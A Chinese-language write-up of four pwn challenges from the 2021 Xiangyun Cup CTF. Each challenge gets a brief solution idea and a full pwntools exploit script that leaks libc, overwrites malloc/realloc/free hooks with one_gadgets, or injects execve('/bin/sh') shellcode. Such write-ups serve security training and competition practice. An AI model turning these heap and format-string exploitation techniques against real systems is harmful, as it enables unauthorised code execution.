2021祥云杯 CTF pwn解 wp
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下
note:
思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce
exp:
#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./note")
libc = ELF("./libc-2.23.so")
#libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
#p = remote("47.104.70.90",25315)
elf = ELF("./note")def add(size,content):p.recvuntil("choice: ")p.sendline("1")p.sendlineafter("size: ",str(size))p.sendlineafter("content: ",content)p.recvuntil("addr: ")#heap_addr = int(p.recv(6).ljust(8,"\x00"))def show():p.recvuntil("choice: ")p.sendline("3")p.recvuntil("content:")content = p.recv()gdb.attach(p,'$rebase 0x1235')
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline("%7$s\x00")payload = p64(0xfbad1800) + p64(0)*3
p.sendline(payload)
raw_input()libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) -0x3c36e0
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("libc_base:"+hex(libc_base))
success("malloc_hook:"+hex(malloc_hook))
rce =0x4527a + libc_baserealloc = libc_base + libc.sym["realloc"]
realloc_hook = libc_base + libc.sym["__realloc_hook"]payload = "%7$s\x00\x00\x00\x00"+p64(realloc_hook)
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline(payload)
raw_input()
#gdb.attach(p)
payload = p64(rce) + p64(realloc+6)
p.recvuntil("? ")
p.sendline(payload)p.sendlineafter("choice:","1")
p.sendlineafter("size:","2")p.interactive()
PassWordBox_FreeVersion:
这题难点就是没难点,当时找到一个加密发现加密这玩意不知道咋用,表现出了菜,后来一个re yeye告诉我这道题可以直接泄露,因为异或的是固定值,才知道了原来是这样,并且还有off-by-one,可以构造chunk overlap,泄露libc,打freehook为rce,即可
exp:
#coding:utf8
from pwn import *
sh = process('./pwdFree')
#sh = remote('47.104.71.220',38562)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')def add(index,size,content):sh.sendlineafter('Choice:','1')sh.sendlineafter('Save:',str(index))sh.sendlineafter('Pwd:',str(size))sh.sendafter('Pwd:',content)def edit(index,content):sh.sendlineafter('Choice:','2')sh.sendline(str(index))sleep(0.5)sh.send(content)def show(index):sh.sendlineafter('Choice:','3')sh.sendlineafter('Check:',str(index))def delete(index):sh.sendlineafter('Choice:','4')sh.sendlineafter('Delete:',str(index))add(0,1,'\x00')
sh.recvuntil('Save ID:')
random = u64(sh.recv(8))
print 'cookie=',hex(random)
add(1,0xF0,'a'*0xF0) #1
add(2,0x80,'b'*0x80) #2
add(3,0x80,'c'*0x80) #3
add(4,0xF0,'d'*0xF0) #4for i in range(5,12):add(i,0xF0,'aaaa'*0xd0)
for i in range(5,12):delete(i)
delete(3)add(3,0x88,'b'*0x80 + p64((0x100 + 0x90 + 0x90) ^ random) + '\x00')
delete(1)
delete(4)
for i in range(5,12):add(i,0xF0,'a'*0xf0)
add(1,0xF0,'a'*0xF0) #1
show(2)
sh.recvuntil('Pwd is: ')
libc_base = (u64(sh.recv(8)) ^ random) - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook_addr = libc_base + libc.sym['__free_hook']
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:rsp & 0xf == 0rcx == NULL0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:[rsp+0x40] == NULL0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULL'''
onegdaget=0x4f432
delete(3)
add(3,0x98,'b'*0x80 + (p64(0 ^ random) + p64(0x91 ^ random) + p64(free_hook_addr ^ random)))
add(20,0x80,p64(0) + 'c'*0x78)
add(21,0x80,p64(onegdaget ^ random) + 'd'*0x78)delete(11)sh.interactive()
JigSaw'sCage :
思路:test有可执行权限,开头有长整型溢出,赋予权限,然后写shellcode。进行打即可
exp:
from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
def add(idx):p.sendlineafter("Choice :", "1")p.sendlineafter("Index? :", str(idx))
def show(idx):p.sendlineafter("Choice :", "5")p.sendlineafter("Index? :", str(idx))
def edit(idx, content):p.sendlineafter("Choice :", "2")p.sendlineafter("Index? :", str(idx))p.sendafter("iNput:", content)
def free(idx):p.sendlineafter("Choice :", "3")p.sendlineafter("Index? :", str(idx))
def test(idx):p.sendlineafter("Choice :", "4")p.sendlineafter("Index? :", str(idx))
s1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
s2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
s3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
s4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
p.sendlineafter("Name:", "max")
p.sendlineafter("Choice:", str(0xffffffff+1)) #int len overlap
add(0)
add(1)
add(2)
add(3)
edit(0,s1)
edit(1, s2)
edit(2, s3)
edit(3, s4)
test(0)
p.interactive()
lemmon:
思路:这题弄麻烦拉,用secomp开到了开启沙箱,就开始想到了打srop,然后出flag,但是看到别的队有使用edit任意写name,然后再进行栈溢出,修改最后几位为栈上flag地址(这里概率很小所以成功1/2000多吧),然后free掉,通过不断的申请,申请到flag内容输出flag,,但这是最好用的方法,但是这里我采用了srop,由于版本是在libc2.26,这里申请freehook遇到了问题,只能申请到mallochook,所以这里采用了一个大胆的想法,就是在mallochook构建一个size,绕过check,再进行不断的申请即可申请到freehook,再设置freehook为setcontext,然后在freehook布置rop,赋予权限,打即可出flag
打栈地址的exp:
from pwn import *
def add(idx, name, size, msg):p.sendlineafter(">> ", "1")p.sendlineafter("emon: \n", str(idx))p.sendafter("emon: \n", name)p.sendlineafter("emon: \n", str(size))p.sendafter("age: \n",msg)
def edit(idx,msg):p.sendlineafter('>>> ','4')p.sendafter("Input the index of your lemon : \n", str(idx))p.sendafter("Now it's your time to draw and color!\n", msg)
def free(idx):p.sendlineafter(">>> ", "3")p.sendlineafter("emon : \n", str(idx))
p=process('./lemon_pwn')context.log_level = 'debug'
p.sendlineafter('me?\n','yes')
p.sendafter('number: \n','111111')
p.sendafter('first: \n','1'*0x10+p32(0x300)+'\x01')p.recvuntil("0x")
low = int(p.recv(3),16)
print hex(low) edit(-260, "1"*0x138+p16(low+0xe000-0x40))
add(0,"A",0x500,"a")
free(0)
add(1, "\x10", 0x10, "a")
add(0, "\x10", 0x10, "a")
add(0, "\x20", 0x500, "a")
p.interactive()
2021祥云杯 CTF pwn解 wp相关推荐
- 2021祥云杯部分pwn
note 格式化字符串 本题考查了scanf的格式化字符串利用.一般我们用的都是printf的格式化字符串.这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的s ...
- 2021羊城杯CTF wp
2021羊城杯(部分)wp Web web1 only 4 web2 EasyCurl web3 Checkin_Go web4 Cross The Side Re Pwn BabyRop Cryp ...
- 2021 祥云杯 pwn-JigSaw’sCage
2021 祥云杯 pwn-JigSaw'sCage 这道题属实是没有发现漏洞点在哪里,所以看了一下wm的wjh师傅的wp,发现漏洞出现下图 v1是int,但scanf是ld,所以溢出了4个字节,这就导 ...
- 2021 祥云杯 pwn-PassWordBox_ProVersion
2021 祥云杯 pwn-PassWordBox_ProVersion 这里就没有off by null了,size也只能是large bin的,那肯定就是large bin attack了,libc ...
- 2021祥云杯PassWordBox_ProVersion
目录 前言: 程序分析 大致思路: 利用链: _IO_wfile_overflow _IO_wfile_underflow_mmap: exp: 前言: 复现一下2021祥云杯PassWordBox_ ...
- 2021 祥云杯 pwn-note
2021 祥云杯 pwn-note 这是一道scanf任意读写的pwn题 漏洞点发生在上图 在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会 ...
- TAMU ctf pwn部分wp+赛后
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga...... Tr*vial 大水题,栈溢出,ret2text exp from pwn import *context(arc ...
- [2021祥云杯]secrets_of_admin
[2021祥云杯]secrets_of_admin 文章目录 [2021祥云杯]secrets_of_admin 代码分析 /的POST方式 /admin的GET方式 /admin的POST方式 /a ...
- 2021 长城杯ctf wp
2021 长城杯 wp Misc 签到 你这flag保熟吗 Crypto baby_rsa Reverse Just_cmp funny_js Web java_url ez_python Pwn K ...
最新文章
- HTML添加上传图片并进行预览
- CentOS6.5更改ssh端口问题
- 自学Python十二 战斗吧Scrapy!
- 补充知识:三元运算和逻辑运算
- docker安装mysql及相关配置、运行细节和常见报错解决方案
- 关于寻路算法的一些思考(2):Heuristics 函数
- mysql中ibatis的limit动态传参
- 关于jQuery获取html标签自定义属性值或data值
- leetcode之String to Integer (atoi)
- Python机器学习房价预测 (斯坦福大学机器学习课程)
- XStream的几个问题
- 位图和矢量图区别,PS和AI的区别
- 【Java架构师入门到精通】java分布式架构有哪些技术
- Windows多媒体开发框架介绍
- 计算机专业在医院的工作,探析计算机在医院工作的应用
- 淘宝运营 高客单价的特点、推广引流方式
- 十分钟教你学会打包APP
- python-装饰器的使用详解
- osgearth]样式表style中参数总结(OE官方文档翻译)
- 在evaluate用到coco-caption时出现subprocess无法创建的错误